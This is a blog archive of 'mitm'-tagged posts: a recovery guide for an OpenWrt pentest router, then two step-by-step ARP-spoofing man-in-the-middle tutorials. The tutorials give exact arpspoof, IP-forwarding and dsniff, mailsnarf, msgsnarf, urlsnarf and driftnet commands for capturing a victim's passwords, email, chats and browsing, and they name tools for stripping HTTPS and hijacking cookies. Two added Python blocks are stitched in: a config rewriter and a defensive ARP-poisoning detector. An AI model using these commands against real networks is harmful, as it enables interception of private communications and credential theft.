Showing posts with label mitm.

2014-09-06

r00tabaga: I F'ed it up! what now!

Lifted from the most excellent Ace Hackware forum: https://acehackware.zendesk.com/entries/25149852-I-broke-my-r00tabaga-

I broke my r00tabaga :(

Taylor Banks posted this on August 09, 2013 17:11
If your r00tabaga gets b0rked, here are a few common diagnostic steps you can take to identify and/or reset the device's behavior that may save you from needing to rebuild.

Get in.

First and foremost: Try to get in, any way you can. Once you're in, you can re-set passwords, change IPs, enable and disable ethernet and wireless adapters, install and uninstall packages and even re-flash the device with a fresh OpenWRT build if you just want to start over from scratch.

If you can't communicate with your r00tabaga:

  • look for an AP you don't recognize with a BSSID that matches your router's MAC address
  • try to connect to it via ethernet and get an IP address from it via DHCP
  • otherwise, the default ethernet IP is possibly 172.16.42.1 (pineapple) or it's acting as a DHCP client (minipwner)
  • if you are unable to ssh to the device on 172.16.42.1, try telnet and ssh on 192.168.1.1 or assign the device an IP with a local DHCP server
  • if you still can't get in via SSH, you can try failsafe mode, which will allow you to re-flash the device:
    power on the device, wait almost 5s, push and hold the reset button for almost 3s, release.
    the r00tabaga should reboot and bring up the ethernet port with 192.168.1.1, listening via telnet.
    > do you see "failsafe" in the motd when you first login?
  • If booted into failsafe mode, try to re-mount your root & extroot:
    mount your root flash filesystem (to manually correct a file) with
    mount_root
    then try
    /etc/init.d/fstab whole_root_enable
    and reboot; you may need to modify /etc/config/fstab.
    once mounted, you'll likely want to modify /etc/config/network and/or /etc/config/wireless
  • otherwise, reboot out of failsafe mode with reboot -f
  • if SSHed in, you can try using activate minipwner or activate pineapple to reset to default configs on a stable build
  • if default configs have been modified or removed, you may need to rebuild (see below).
OpenWRT Resources:

Option 1 - Rebuild it from scratch.

To rebuild a r00tabaga:

Read all of the directions through at least once before proceeding so that you understand the process from start to finish. While it isn't complex, building r00tabagas manually does take a little patience and requires at least basic knowledge of a linux or OS X command line. We've automated the setup and configuration in our lab, but knowing how to rebuild your r00tabaga from scratch, by hand, may still come in handy when you least expect it. :)
  1. Try to login via telnet or ssh and do a firstboot && reboot. If you can do so, it's faster and easier than re-flashing, but should accomplish the same goal, which is a reset of configuration files to their default state.
  2. Once in firstboot, you can: 
  3. Re-flash the r00tabaga with attitude-adjustment. If you're using an MR11Uv2, you need the eko build.
    Download the firmware and host it for download on your local machine with netcat (OpenBSD/OS X nc syntax; GNU netcat wants nc -l -p 6666):
    nc -l 6666 < filename.bin
  4. From your router, download the firmware from your local machine with netcat (192.168.1.111 being your local machine's address), then write it to the firmware partition:
    cd /tmp
    nc 192.168.1.111 6666 > filename.bin
    mtd -r write filename.bin firmware
  5. Build as Pineapple using a pivot root
    (If you have a dd image from your original r00tabaga USB drive, you can skip copying the filesystem and go straight to the section entitled Re-image It below.)
  6. Copy firewall, network and wireless configs into /etc/config directory as *.p
  7. Copy MiniPwner files into /etc/config as *.m
  8. Install MiniPwner packages (from the list in step 20, but do NOT install to the usb dest since it's a pivot root)
  9. Download and install the activate script to /usr/bin, adjust paths as necessary
  10. install any additional optional packages
  11. run activate minipwner && reboot

Option 2 - Re-image it.

If you want to start with a known-good image of the 8GB root filesystem used at build time, you can download it here and rebuild your r00tabaga by configuring the device to mount the USB filesystem as an extroot. This method is known to work with Sandisk Cruzer Fit 8GB sticks, and has not been tested or verified to work with any other devices.
  • Re-flash the r00tabaga with attitude-adjustment (make sure to use the correct version for your hardware! MR11Uv2 needs the eko build to flash from the web gui) or login to the device and run firstboot to get the router into a known fresh state
  • Download this dd image and write it to an 8GB Sandisk Cruzer Fit stick.
  • Power on the router
  • Enable wireless so that we can get the wireless adapter's MAC address:
    cp /etc/config/wireless /etc/config/wireless.orig 2>/dev/null
    sed -e 's/option disabled 1/# option disabled 1/' </etc/config/wireless.orig >/etc/config/wireless 2>/dev/null
    reboot
  • Make backups of all of the files in /etc/config/ as well as /etc/opkg.conf
  • Determine the MAC address of your r00tabaga:
    ifconfig -a | awk '/wlan0/{print $5}'
  • Edit /etc/config/wireless as below, replacing the MAC address with your own and the ssid (ex: my-home-wifi), encryption mode (ex: psk2) and key (ex: 1234567890)  with values corresponding to a wireless network your r00tabaga can use to connect to the internet to complete its configuration:
    config wifi-device wlan0
       option type mac80211
       option channel 6
       option macaddr xx:xx:xx:xx:xx:xx
       option hwmode 11ng
       option htmode HT20
       list ht_capab SHORT-GI-20
       list ht_capab SHORT-GI-40
       list ht_capab RX-STBC1
       list ht_capab DSSS_CCK-40
       # REMOVE THIS LINE TO ENABLE WIFI:
       # option disabled 1
    config wifi-iface
       option device wlan0
       option network wan
       option mode sta
       option ssid {xxxx}
       option encryption {xxxx}
       option key {xxxx}
  • Add a WAN stanza to /etc/config/network that looks like this:
    config interface 'wan'
       option ifname 'wlan0'
       option proto 'dhcp'
  • Bounce the network to restart the wifi adapter:
    /etc/init.d/network restart
  • Confirm you've got internet access via wlan0:
    ifconfig
    ping 4.2.2.2
  • Insert the USB stick and confirm that the filesystems are visible. You should be able to see the contents of the USB stick mounted under /mnt/sda2
  • Edit /etc/opkg.conf and make sure the URL for the attitude adjustment repository is:
    http://downloads.openwrt.org/attitude_adjustment/12.09/ar71xx/generic/
  • Install base packages and dependencies:
    opkg update
    opkg install block-mount kernel kmod-usb-core kmod-usb2 kmod-usb-ohci kmod-usb-storage kmod-fs-ext4 kmod-scsi-generic
  • Create an /etc/config/fstab file that looks like this (assuming your USB filesystem is on sda2 with swap on sda1):
    config global automount
       option from_fstab 1
       option anon_mount 1

    config global autoswap
       option from_fstab 1
       option anon_swap 0

    config mount
       option target /
       option device /dev/sda2
       option fstype ext4
       option options rw,sync
       option enabled_fsck 0
       option enabled 1

    config swap
       option device /dev/sda1
       option enabled 1
  • Reboot.
  • Now enable the pivot root:
    /etc/init.d/fstab whole_root_enable
  • Reboot again. 
  • Now update all of your wireless configs (/etc/config/wireless.*) to have the correct MAC address identified above.
  • Finally, update your wireless SSIDs to match your device MAC:
    export MAC=`ifconfig -a | awk -F: '/wlan0/{print $6$7}'`
    sed -i -e "s/option ssid.*/option ssid r00tabaga-${MAC}/" /etc/config/wireless.m
    sed -i -e "s/option ssid.*/option ssid r00tabaga-${MAC}/" /etc/config/wireless
    /usr/sbin/activate minipwner
  • ... and reboot one last time.
  • Et voila! One updated r00tabaga!
Broke it beyond your ability to repair it? Contact support@acehackware.com
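An added example, not code from the forum post or from Ace Hackware: a small Python parser and rewriter for the OpenWrt UCI file the rebuild edits by hand (/etc/config/wireless), applying the two MAC-dependent changes the procedure makes with sed/awk: setting option macaddr and deriving the r00tabaga-XXYY SSID from the last two octets. The sample config is constructed from the stanza above; the parse/rewrite functions and their names are assumptions, and on the device itself the shell commands shown are what actually run.

```python
# Added example, not code from the forum post or Ace Hackware: a small parser and
# rewriter for OpenWrt UCI files (here /etc/config/wireless) that applies the
# MAC-dependent edits the rebuild makes by hand with sed/awk.
import re
MAC_RE = re.compile(r"^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$")

def parse_uci(text):
    """Parse UCI text into [(section_type, section_name, [(key, value), ...]), ...]."""
    sections = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        parts = line.split(None, 2)
        tail = parts[2].strip("'\"") if len(parts) > 2 else ""
        if parts[0] == "config":
            sections.append((parts[1], tail, []))
        elif parts[0] in ("option", "list") and sections:
            sections[-1][2].append((parts[1], tail))
    return sections

def ssid_for_mac(mac):
    """SSID the procedure derives from the wlan0 MAC: r00tabaga-<last two octets>."""
    if not MAC_RE.match(mac):
        raise ValueError("not a MAC address: %r" % mac)
    return "r00tabaga-" + "".join(mac.split(":")[4:])

def apply_mac(text, mac):
    """Set every 'option macaddr' and 'option ssid' line of a wireless config for this MAC."""
    ssid = ssid_for_mac(mac)
    out = []
    for line in text.splitlines():
        words = line.strip().split(None, 2)[:2]
        if words == ["option", "macaddr"]:
            line = re.sub(r"(option\s+macaddr\s+).*", r"\g<1>" + mac, line)
        elif words == ["option", "ssid"]:
            line = re.sub(r"(option\s+ssid\s+).*", r"\g<1>" + ssid, line)
        out.append(line)
    return "\n".join(out) + "\n"

# Constructed sample mirroring the wireless stanza above, placeholders still in place.
SAMPLE_WIRELESS = """config wifi-device wlan0
   option type mac80211
   option macaddr xx:xx:xx:xx:xx:xx
   # option disabled 1
config wifi-iface
   option device wlan0
   option ssid {xxxx}
"""
```

Run apply_mac over /etc/config/wireless and /etc/config/wireless.m alike, since the procedure expects both to carry the same MAC-derived SSID.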

2014-08-21

Dsniff and Arpspoof on Mac

This post was originally posted by Lump on machack.org on 24 September 2013 - 12:25 PM.  I have not tested this myself, so no guarantees here.

Using this without authorization is illegal in most places. This guide is for educational and learning use only. Please use common sense and respect personal privacy.


1. What is a Man in the Middle Attack?

As the name describes, you will be the man in the middle, meaning that you will sneak into the connection between the attacked device and the router. This implies that you are inside the same network (WLAN) as the target. This attack gives you access to all data running through the attacked device's Internet connection, giving you the possibility to sniff for chats, email, passwords and many, many more things.


2. How can I be safe from that?

There are tools that prevent others from flushing your ARP cache, or you can just use strong encryption while surfing the Internet, such as PGP (email) or HTTPS. These are just examples; you will find solutions if you search for them.


3. How does the Attack work?

The ARP protocol is used to map IP addresses to specific MAC addresses. Computers use this to identify other devices in the local network. By spoofing ARP replies you can spoof your identity, meaning that your computer seems to be the targeted computer (from the view of the router) and at the same time the targeted computer thinks you are the router. Here is a basic schema of this setup:

[image: schema of the man-in-the-middle setup]

4. Before we start:

First of all you need a tool to spoof these ARP replies. There are some, but for this tutorial we will use the tool arpspoof, which is part of the dsniff package. To get this tool running on Mac OS X your best bet is to use MacPorts, so go ahead and download the right version for your operating system: Download Page. After that you should be able to use the port command in Terminal (/Applications/Utilities/Terminal.app). Run

    sudo port selfupdate

followed by

    sudo port install dsniff-devel

or

    sudo port install dsniff

Note that when you type in your admin password it will not be displayed! Let the installation run; this can take some time. After it's finished you should be able to use the arpspoof command in Terminal.

5. Run the Attack:

Now you're able to start the attack, but before that you should choose the device you want to attack. To find all devices in your local network use this command:

    arp -a

[image: arp -a output]

The first IP is most likely your router's address. Now if you know the IP of your victim and the IP of your router then you have almost all the information you need to start the attack. We only need to do one more thing. There is one problem if you intercept someone's Internet connections: you receive packets that are not meant to be sent to you, so the operating system will not forward them to the destination; it will just drop them, leaving the attacked one without an Internet connection. To get around this, run these commands in Terminal:

    sudo sysctl -w net.inet.ip.forwarding=1
    sudo sysctl -w net.inet.ip.fw.enable=1

This will enable packet forwarding on OS X systems. Now open up two new Terminal windows and run these two commands:

    sudo arpspoof -i YOURINTERFACE -t VICTIMIP ROUTERIP
    sudo arpspoof -i YOURINTERFACE -t ROUTERIP VICTIMIP

Replace:
  • YOURINTERFACE with the name of your interface (for WLAN connections most likely en1 and for LAN most likely en0)
  • VICTIMIP with the IP address of your victim
  • ROUTERIP with your router IP

After this it should look like this:

[image: the two arpspoof terminal windows]

Keep these two windows open until you want to stop your attack! Okay, so now this is all you need to do; you're now redirecting the victim's traffic over your computer to the destination, so you're able to read all transmitted data.

6. How can I sniff Data?

The dsniff package contains some more very nice tools:
  • mailsnarf - as the name explains, sniffs for mails
  • dsniff - for common password sniffing (for some reason does not capture all passwords)
  • msgsnarf - this is meant for specific messages
  • urlsnarf - to sniff for browsed websites and user agents
  • dnsspoof - to spoof DNS requests and redirect websites
  • webmitm - used to decrypt SSL (HTTPS) with faked certificates
Other useful tools:
  • Ettercap-ng - ARP spoofing and password sniffing tool
  • SSLStrip - to decrypt SSL (HTTPS) websites (did not get this one to run on OS X!)
  • tcpdump - dump all captured traffic for later analysis and cookie stealing
  • hamster & ferret - cookie hijacker
There are scripts for Facebook chat sniffing and you will find much more if you search for it.


7. How do I stop the Attack?

Just hit ctrl+c in the opened Terminal, wait 3-4 sec and then the tool should be terminated. I hope you enjoyed, happy hacking
 
This post has been edited by Lump: 25 September 2013 - 02:32 AM 

2011-08-31

(!) Driftnet + ARP Poisoning = OverLord

These are the command line tools we will be using to spoof our subject into thinking that we are the router, therefore sending all its network traffic requests through us.

Tools: dsniff suite and driftnet.
on Ubuntu: apt-get install driftnet dsniff

Before we get our attack started we’ll need to enable packet forwarding. This means we’ll allow the traffic of our subjects to flow through our machine. We need to switch on ip_forwarding.

1. To check the current setting type: cat /proc/sys/net/ipv4/ip_forward
if you get a "0", it is currently off.

2. Type the following to turn it on: echo 1 > /proc/sys/net/ipv4/ip_forward
"1" being to switch it on.

3. Then you can check again: cat /proc/sys/net/ipv4/ip_forward

4. Now we have to setup the traffic flow using arpspoof. the switch "-t" means target.

arpspoof -t 10.10.10.1 10.10.10.99 - watch traffic from x.x.x.1 (router) to x.x.x.99 (host)
we'll also do the reverse to watch traffic going the opposite direction:
arpspoof -t 10.10.10.99 10.10.10.1

5. Let the fun begin: OverLord!
msgsnarf -i eth0 - will watch chat sessions and messenger clients (yahoo,gmail,irc...etc)
urlsnarf -i eth0 - will show the URLs visited by the subject
mailsnarf -i eth0 - will watch for emails
dsniff -i eth0 - will watch for passwords
driftnet -i eth0 - will watch for pictures on the net

6. To shut down all: killall arpspoof
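As an added example (not code from Lump's post or from the 2011 post above), the defensive counterpart to both tutorials: a passive monitor that watches ARP replies and flags the cache-poisoning pattern the paired arpspoof commands produce, which is the kind of ARP-watching tool the "How can I be safe from that?" section mentions. The SAMPLE_REPLIES data is constructed, not a capture, and feeding the function from a live interface or pcap is assumed to happen outside the block.

```python
# Added example, not code from either post: a passive ARP-poisoning monitor. It consumes
# ARP "is-at" replies and reports the two symptoms of the arpspoof setup described above:
# a known IP suddenly answered by a new MAC, and one MAC answering for several IPs.
from collections import defaultdict

# Constructed sample (not a real capture): each entry is (seconds, sender_ip, sender_mac).
# Normal traffic first, then a host with MAC de:ad:be:ef:00:ee poisons both the router
# (10.10.10.1) and a workstation (10.10.10.99), mirroring the two arpspoof commands above.
SAMPLE_REPLIES = [
    (0.0, "10.10.10.1", "aa:aa:aa:aa:aa:01"),
    (0.5, "10.10.10.99", "aa:aa:aa:aa:aa:99"),
    (1.0, "10.10.10.20", "aa:aa:aa:aa:aa:20"),
    (2.0, "10.10.10.1", "de:ad:be:ef:00:ee"),   # "I am the router"
    (2.1, "10.10.10.99", "de:ad:be:ef:00:ee"),  # "I am the workstation"
    (4.0, "10.10.10.1", "de:ad:be:ef:00:ee"),   # arpspoof repeats every ~2 s
]

def detect_arp_poisoning(replies, static=None):
    """Return a list of alert strings, one per newly observed symptom.

    static: optional {ip: mac} the operator trusts (pin the gateway here); every other
    IP is learned from its first reply, so a later reply with a different MAC is flagged.
    """
    known = {ip: mac.lower() for ip, mac in (static or {}).items()}  # ip -> trusted mac
    claimed = defaultdict(set)  # mac -> ips it has answered for
    reported = set()            # (ip, mac) conflicts already alerted on
    alerts = []
    for t, ip, mac in replies:
        mac = mac.lower()
        if ip in known and known[ip] != mac:
            if (ip, mac) not in reported:  # alert once per conflicting pair
                reported.add((ip, mac))
                alerts.append("t=%.1f %s changed %s -> %s" % (t, ip, known[ip], mac))
        else:
            known.setdefault(ip, mac)      # first sighting becomes the baseline
        if ip not in claimed[mac]:
            claimed[mac].add(ip)
            if len(claimed[mac]) > 1:      # one MAC, several IPs: the two-sided spoof
                alerts.append("t=%.1f %s claims %s" % (t, mac, ",".join(sorted(claimed[mac]))))
    return alerts
```

A host that legitimately changes IP (DHCP renewal) also trips the second check, so pin the gateway via static and treat the "changed" alerts as the high-confidence signal.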